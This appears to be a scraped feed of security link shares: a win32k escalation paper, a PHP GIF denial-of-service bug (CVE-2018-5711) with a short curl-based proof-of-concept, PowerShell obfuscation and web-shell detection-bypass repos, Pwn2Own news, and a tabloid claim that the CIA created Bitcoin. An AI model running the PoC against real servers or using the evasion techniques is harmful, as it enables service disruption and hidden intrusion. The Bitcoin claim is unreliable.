Openrce Book store
http://www.openrce.org/reference_library/bookstore
http://www.openrce.org/reference_library/bookstore
Analyzing local privilege escalations in win32k
http://uninformed.org/?v=10&a=2&t=sumry
http://uninformed.org/?v=10&a=2&t=sumry
Infinite loop PHP with gif
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html
PoC:
http://blog.orange.tw/2018/01/php-cve-2018-5711-hanging-websites-by.html
PoC:
$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif
$ php -r 'imagecreatefromgif("poc.gif");'
Orange
PHP CVE-2018-5711 - Hanging Websites by a Harmful GIF
This is 🍊 speaking
Bitcoin is US Dollar 2.0 Created by CIA | Kaspersky Co-founder
https://www.express.co.uk/finance/city/907323/Bitcoin-created-spy-US-government-CIA-MI5-secret-mission-fund-pay-price
https://www.express.co.uk/finance/city/907323/Bitcoin-created-spy-US-government-CIA-MI5-secret-mission-fund-pay-price
Express.co.uk
Bitcoin ‘created as dollar 2.0 by US to fund secret CIA missions'
BITCOIN was created by US intelligence services to send untraceable funding to top-secret international CIA and MI5 missions, according to a shock new claim.
Powershell-Obfuscation
* Reverse String
* Spliting
* Replace string
* Concatenate string
* ...
https://github.com/raminfp/Powershell-Obfuscation
* Reverse String
* Spliting
* Replace string
* Concatenate string
* ...
https://github.com/raminfp/Powershell-Obfuscation
[+] Bypass anti sheller
Today I became aware, ALFA [hxxps://github.com/solevisible/ALFA-SHELL] shell function
this is a technique for bypass anti shell [hxxp://www.shelldetector.com/]
https://gist.github.com/raminfp/976382480f0b59a8d8fd6df901e6dc86
Today I became aware, ALFA [hxxps://github.com/solevisible/ALFA-SHELL] shell function
eval() detected with anti sheller(hxxps://t.me/solevisible/83),this is a technique for bypass anti shell [hxxp://www.shelldetector.com/]
https://gist.github.com/raminfp/976382480f0b59a8d8fd6df901e6dc86
Gist
PHP bypass anti shell
PHP bypass anti shell . GitHub Gist: instantly share code, notes, and snippets.
PWN2OWN 2018 PARTNERS WITH MICROSOFT AND SPONSORED BY VMWARE
https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware
https://www.zerodayinitiative.com/blog/2018/1/25/pwn2own-returns-for-2018-partners-with-microsoft-and-sponsored-by-vmware
Zero Day Initiative
Pwn2Own Returns for 2018: Partners with Microsoft and Sponsored by VMware
The Quick Summary · Pwn2Own returns for 2018 with five categories of targets : virtualization, web browsers, enterprise applications, servers, and a special Windows Insider Preview Challenge category. · ZDI partners with Microsoft for the event and welcomes…
Exploiting Custom Template Engines
https://depthsecurity.com/blog/exploiting-custom-template-engines
https://depthsecurity.com/blog/exploiting-custom-template-engines
Depth Security | A Konica Minolta Service
Exploiting Custom Template Engines | Depth Security
When performing an application assessment, one of the areas within an app Depth Security pays particular attention to is any ability to define custom templates.